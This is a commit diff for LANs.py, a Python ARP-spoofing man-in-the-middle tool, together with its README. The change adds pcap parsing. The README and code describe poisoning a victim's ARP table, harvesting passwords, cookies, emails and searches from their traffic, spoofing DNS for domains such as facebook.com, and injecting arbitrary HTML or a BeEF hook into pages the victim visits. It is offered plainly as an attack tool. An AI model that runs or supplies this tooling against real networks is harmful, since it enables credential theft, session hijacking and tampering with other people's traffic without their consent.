added pcap reading ability

LANs.py

@@ -52,6 +52,9 @@ parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/
 parser.add_argument("-na", "--nmapaggressive", help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.", action="store_true")
 parser.add_argument("-n", "--nmap", help="Scan the target for open ports prior to starting to sniffing their packets.", action="store_true")
 parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.")
+###########################################
+parser.add_argument("-pcap", "--pcap", help="Parse through a pcap file")
+###########################################
 args = parser.parse_args()
 
 #Console colors
@@ -108,11 +111,17 @@ class Parser():
 	user_agent = None
 
 	def start(self, payload):
-		try:
+		if args.pcap:
-			data = payload.get_data()
+			if args.ipaddress:
-			pkt = IP(data)
+				try:
-		except:
+					pkt = payload[IP]
-			return
+				except:
+					return
+		else:
+			try:
+				pkt = IP(payload.get_data())
+			except:
+				return
 
 		IP_layer = pkt[IP]
 		IP_dst = pkt[IP].dst
@@ -404,7 +413,6 @@ class Parser():
 			if args.urlspy:
 				d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
 				if any(i in url for i in d):
-#					payload.set_verdict(nfqueue.NF_ACCEPT)
 					return
 				if len(url) > 146:
 					print '[*] '+url[:145]
@@ -490,7 +498,7 @@ class Parser():
 					return
 				else:
 					self.Cookies.append(x)
-				print P+'[+] Cookie found for '+W+host+P+' logged in intercept.log.txt'+W
+				print P+'[+] Cookie found for '+W+host+P+' logged in LANspy.log.txt'+W
 				logger.write('[+] Cookie found for'+host+':'+x.replace('Cookie: ', '')+'\n')
 
 	def user_pass(self, username, password):
@@ -866,10 +874,32 @@ def threads():
 		except:
 			print '[-] Could not open SEToolkit, continuing without it.'
 
+def pcap_handler():
+	global victimIP
+	bad_args = [args.dnsspoof, args.beef, args.code, args.nmap, args.nmapaggressive, args.driftnet, args.interface]
+	for x in bad_args:
+		if x:
+			sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
+	if args.pcap:
+		if args.ipaddress:
+			victimIP = args.ipaddress
+			pcap = rdpcap(args.pcap)
+			for payload in pcap:
+				Parser().start(payload)
+			sys.exit('[-] Finished parsing pcap file')
+		else:
+			sys.exit('[-] Please include the following arguement when reading from a pcap file: -ip [target\'s IP address]')
+	else:
+		sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
 
+# Main loop
 def main():
 	global victimIP, interface
 
+	if args.pcap:
+		pcap_handler()
+		sys.exit('[-] Finished parsing pcap file')
+
 	#Check if root
 	if not geteuid()==0:
 		exit("\nPlease run as root\n")

README.md

@@ -3,12 +3,13 @@ LANs.py
 
 Multithreaded asynchronous packet parsing/injecting arp spoofer.
 
-Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
+Individually arpspoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
 
 
 Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted, BeEF (optional), wireless card capable of injection
 
-Tested on Kali 1.0
+Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
+
 
 
 Simplest usage:
@@ -17,10 +18,9 @@ Simplest usage:
 python LANs.py
 ```
 
-Because there's no -ip option this will arp scan the network, compare it to a live running promiscuous capture, and tell you the clients on the network that are sending the most packets, give Windows netbios names, then you can Ctrl-C and pick your target which it will then ARP spoof. Simple ARP spoofing.
+Because there's no -ip option this will arp scan the network, compare it to a live running promiscuous capture, and tell you the clients on the network that are sending the most packets, give Windows netbios names, then you can Ctrl-C and pick your target which it will then ARP spoof. Simple ARP spoofing. 
 
-
+Passive harvesting usage:
-Passive usage:
 
 ```
 python LANs.py -u -d -p -ip 192.168.0.10
@@ -50,7 +50,16 @@ panel that the browser is hooked on. This is OK. If they don't get hooked on the
 python LANs.py -c '<title>Owned.</title>'
 ```
 
-Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> and failing that injects prior to the first </head>.
+Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> and failing that injects prior to the first </head>. This example will change the page title to 'Owned.'
+
+
+Read from pcap:
+
+```
+python LANs.py -pcap libpcapfilename -ip 192.168.0.10
+```
+
+To read from a pcap file you must include the target's IP address with the -ip option
 
 
 Aggressive usage:
@@ -64,44 +73,47 @@ All options:
 python LANs.py -h
 ```
 
--u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
+-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
+
+-c 'HTML CODE': inject arbitrary html code into pages the victim vists; include the quotes when selecting HTML to inject
 
 -d: open an xterm with driftnet to see all images they view
 
--p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
+-dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
 
--ip: target this IP address 
+-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
 
 -i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0
 
--dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
+-ip: target this IP address 
 
 -n: performs a quick nmap scan of the target
 
 -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
 
+-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
+
+-pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
+
 -v: show verbose URLs which do not truncate at 150 characters like -u
 
--b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
-
--c 'HTML CODE': inject arbitrary html code into pages the victim vists; include the quotes when selecting HTML to inject
-
-
 
 Cleans the following on Ctrl-C:
 
-  Turn off IP forwarding
+--Turn off IP forwarding
 
-  Flush iptables firewall
+--Flush iptables firewall
+
+--Individually restore each machine's ARP table
 
-  Individually restore each machine's ARP table
 
 
 To do:
 
-Add ability to read from pcap file
+-Add ability to read from pcap file
+
 
 
 Technical details:
 
-This script uses python nfqueue-bindings wrapped in Twisted to feed packets to callback functions as well as drop or forward certain packets. From there scapy takes over to parse and inject. 
+This script uses python an nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.